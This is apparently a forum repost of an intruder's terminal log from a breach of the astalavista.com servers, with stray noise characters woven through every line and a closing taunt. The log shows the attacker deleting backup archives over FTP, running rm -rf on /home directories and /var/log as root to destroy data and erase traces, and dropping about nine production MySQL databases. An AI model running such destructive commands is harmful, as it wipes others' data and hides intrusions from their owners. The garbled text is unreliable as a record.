( z2 v2 l; S# H+ l, K1 p' O150 Opening BINARY mode data connection for ‘file list’.4 F/ S- W+ h; S+ ?: h2 }/ e0 W3 k
-rw-rw-rw- 1 astalavista.com users 23410936878 Apr 29 22:10 09-04-28-astacom_full.tar
) d' @% r; S! N/ P* H-rw-rw-rw- 1 astalavista.com users 20617651590 Apr 29 14:18 09-04-28-astacom_full.tar.bz2
" u* E$ d @( `# F# W% o1 {1 I2 v2 k% W% y-rw-rw-rw- 1 astalavista.com users 88287111 Apr 29 15:57 09-04-29-astacom_sql_full.sql.tar.bz2
9 M! {" L3 @ w# ?) t$ d$ s-rw-rw-rw- 1 astalavista.com users 26413034040 May 2 00:21 09-05-01-astacom-Public_HTML.tar
0 S3 p: O; l1 W$ U3 o5 F, I-rw-rw-rw- 1 astalavista.com users 277843549 May 1 17:29 09-05-01-astacom-SQL_Dump.tar
) a* I) \0 v/ |/ _1 T& o$ r7 g2 e[snip]2 \4 ~* Z6 N6 e$ k7 g( G
226 Transfer complete.
# r4 e$ Y# J1 [/ b+ G& Fftp> mdelete *$ k2 x0 g. I6 n7 O7 H; v, }
ftp> ls -la- L0 r/ W3 k1 a: M1 S6 f* q. b1 Q
227 Entering Passive Mode (212,254,194,163,2,193)9 `# S6 @* H8 J5 ]* y8 i
150 Opening BINARY mode data connection for ‘file list’.+ A: M- _& O, R; D! C
226 Transfer complete./ \. Z% {8 p0 W. ^0 m
ftp>
# |; K: X/ ~% Q# R! \3 a4 W3 i6 J5 T2 w) \( F! F3 Q' G' U/ ^& S
sh-3.2# cd /home( Q8 j, q& s. R/ F3 j; I
sh-3.2# ls -la
F. e, s% d* n0 _# {total 1206 [; R8 \9 u& N+ D( W7 d6 z
drwxr-xr-x 14 root root 4096 Mar 11 17:56 .) R2 m" g2 e% ^7 e
drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
4 `6 g' M; t$ |- Ydrwx–x–x 9 admin admin 4096 Nov 28 2007 admin, M- O L/ @" ]* f7 v
-rw——- 1 root root 8192 Jun 4 03:03 aquota.group# B1 W9 P, q8 A5 z( t# H. c
-rw——- 1 root root 8192 Jun 3 02:45 aquota.user
4 u2 x# |: M7 q; |9 xdrwx–x–x 6 astanet astanet 4096 Jun 4 09:51 astanet- Y! f4 I% _' _4 \0 T |* g2 z
drwxr-xr-x 2 root root 4096 Jul 29 2008 backup
. \. \3 n4 f" U! C7 v; A1 Hdrwxr-xr-x 2 root root 4096 Sep 17 2008 backup.141615 u0 T" ~& u, T
drwx–x–x 10 com com 4096 Apr 28 12:40 com# o1 j" K1 S& O7 [
drwxr-xr-x 2 root root 4096 May 17 2007 ftp
) K1 o% }; b/ ?drwx—— 3 jon jon 4096 Sep 21 2007 jon8 t& f' b5 `# v! U9 x$ _
drwx—— 2 root root 16384 Sep 11 2007 lost+found
" e! o, M u5 l3 `4 d) r7 Xdrwxr-xr-x 2 root root 4096 Sep 14 2007 my
; o9 d6 \. \) d2 A- Xdrwxr-xr-x 5 mysql mysql 4096 Sep 24 2007 mysqldata, U: a# ]. ~& N4 m
drwx—— 2 jon jon 4096 Sep 15 2007 test
; Y4 x" C) t5 Y) m% J! Odrwxrwxrwt 2 root root 4096 Jul 29 2008 tmp
# T7 o( v! R3 g) F. v! N+ P0 [. e9 k2 y2 C k B- |
sh-3.2# rm -rf backup/- z4 B+ X7 z: x1 B
sh-3.2# rm -rf backup.14161/
2 k( J/ K* l6 `4 p+ ash-3.2# rm -rf ftp/9 p2 K- w/ ]+ }
sh-3.2# rm -rf jon/0 a0 D# r+ ` Y/ Y# L: I
sh-3.2# rm -rf my/. w, o& D" Z7 W8 v, _3 k
sh-3.2# rm -rf mysqldata/* U4 |* B4 h" d5 O2 y
sh-3.2# rm -rf test/2 V- \8 C3 x1 ~" C7 N
sh-3.2# rm -rf tmp/
2 @# g4 T# \; t0 k! |sh-3.2# cd ~: t: u1 O7 H. W8 U O- b$ H+ ?
sh-3.2# rm -rf *. [. j' c* z2 R1 W
sh-3.2# rm -rf /var/log/5 g2 v! }1 N! n8 ]$ G
rm: cannot remove directory `/var/log//proftpd’: Directory not empty) Y+ B6 |8 p: u% k
sh-3.2# rm -rf /home/*. o+ m/ R- d" j% S# q
sh-3.2# mysql) x) V2 s. K4 W; J( k( o( m
Welcome to the MySQL monitor. Commands end with ; or \g. _! A/ ^# r' s, ?0 ?3 d0 f% t3 V
Your MySQL connection id is 407156
9 _3 o/ p/ G9 Y2 y/ DServer version: 5.0.45-community-log MySQL Community Edition (GPL)$ I+ y1 ~. P' o, F+ V5 r) k
* m$ k4 R4 k* V. \/ [/ N" G9 `9 A$ iType ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.
, g4 F( I4 m) v# T7 T1 ^: L2 e* x3 m7 m7 e+ @$ r; q
mysql> show databases;7 @0 b% f0 P' q" m X# c0 B& V' Z
+———————–+
* B f' U& f T| Database |
- u/ A, c: ] }( s( |/ o+———————–+9 E8 x. Q# F+ t" w
| information_schema |: I( t. F+ w% e* R( f. x3 t
| astanet_ads |( R6 ?7 r7 @& F+ v
| astanet_mailing_lists |
4 l0 J& \$ L( Z0 \# x| astanet_mediawiki |
5 x( r8 C1 T3 u& N' p) h| astanet_membersystem |/ F: r/ R7 O- k7 ~5 r' o5 y" ]
| com_contrexx |
' h2 V& m5 ?% m# E# e7 i, z- K; I| com_contrexx2 |- G5 ]) L, _0 s7 v# X0 C. j
| com_contrexx2_live |
& }* z s5 A; L n% P2 B| da_roundcube |& u' I( |0 g- g2 ]( h0 q
| dolphin |
: s7 I3 M: a: N) u+ R1 B# c! a| ideapool |
- ?3 w' O7 b W. D| mysql |
( H, R- y, `6 Y0 t| test |2 ]; A. o Q, l4 W
| yourmaster |
: _# T7 F9 H, z7 {+———————–+9 u w* w8 N0 a+ F1 h
14 rows in set (0.03 sec)
+ `4 H( q; F$ Y) R' `( v/ |1 r# l( X# a8 L
mysql> drop database astanet_membersystem;
+ _$ c2 c. l. K/ a8 OdroQuery OK, 46 rows affected (0.81 sec)
% p# H2 x! Y8 T8 Z) G+ S' }* l6 P7 y6 @7 R, _: E% ~. T5 N' e% `' K
mysql> drop database com_contrexx;
* z# U% B E3 p9 bQuery OK, 211 rows affected (2.72 sec)5 Z/ B4 {5 k) G( y* d
! Y u' j3 P0 z9 o* Qmysql> drop database com_contrexx2;
* K+ J: \' V3 L$ Z! i& T, UQuery OK, 237 rows affected (2.23 sec)
; _3 Z! Y8 b: i7 _# C' @$ `, O1 A- K% C2 W$ ^9 O
mysql> drop database com_contrexx2_live;
" ~# ^1 B4 m" w3 P7 t1 ]2 Q# x5 @Query OK, 227 rows affected (7.63 sec); F8 u) g9 P& I& ?8 ?8 x, ]
0 V* C) N. ^: v0 fmysql> drop database ideapool;- X" O& Z1 ^$ f
Query OK, 69 rows affected (0.19 sec)
) a* @8 N U2 Q- ^; x9 _) v: ?2 }# e% R" }
mysql> drop database yourmaster;# ~% G" i) c! m* _3 r% r
Query OK, 158 rows affected (0.55 sec)/ t3 _5 r3 g8 ^8 E6 ]4 L
9 s( n1 R7 J5 P+ E. b2 t" Bmysql> drop database astanet_ads;
9 i2 M8 n/ O: a: u1 e& m+ IQuery OK, 9 rows affected (0.11 sec)
* u1 V4 E& E- H$ P2 H% D* l
& o* B; ?" `' i Mmysql> drop database astanet_mailing_lists;
, V0 \: p. c4 l- |- Y, `: W( uQuery OK, 24 rows affected (1.47 sec)
8 C% M, W' Z# v) K* C4 b; T
2 K$ W0 g3 K5 Y2 \+ w' ~mysql> drop database astanet_mediawiki;* P+ e! _1 [. H
Query OK, 31 rows affected (0.51 sec)+ d' r* v9 l: J* J( }" {
* P& x* g# O. @! ]1 ~; fmysql> show databases;
7 h, b* U9 d1 r. [+ V+——————–+
. S" o8 Y/ k* p8 q$ D9 K3 @| Database |
) S' {5 o! P( e+——————–+2 Q4 h- x6 v9 Z. W: f
| information_schema |
1 k1 X2 B7 o: q| da_roundcube |: ^" g b2 O! ^% Y' Y2 b% c
| dolphin |
! r- ^+ z9 ]1 `/ N; q6 k( l. Q& B7 n| mysql |. J' m8 _5 i8 k, [& t$ W
| test |
( Y. @+ }. \% T2 \+ ?$ A w1 j+——————–+
/ m" h, Y+ B6 m+ q _5 rows in set (0.00 sec)
0 X% y# S* h5 k1 _7 m
! z% r5 C$ C+ h2 a5 cWhat a journey! We’re not sure exactly why the “Terminator” had any influence on
5 `! b0 K& b0 x, n L% R3 Gtheir naming (conventions) but we’re sure Arnold himself wouldn’t be in the" B `6 m1 O7 |& R7 U5 Q
wrong to say this pack of morons *wont be back*.
5 ?/ n; t2 Z6 O |
发表于 2012-11-6 21:07:34
收藏
支持
反对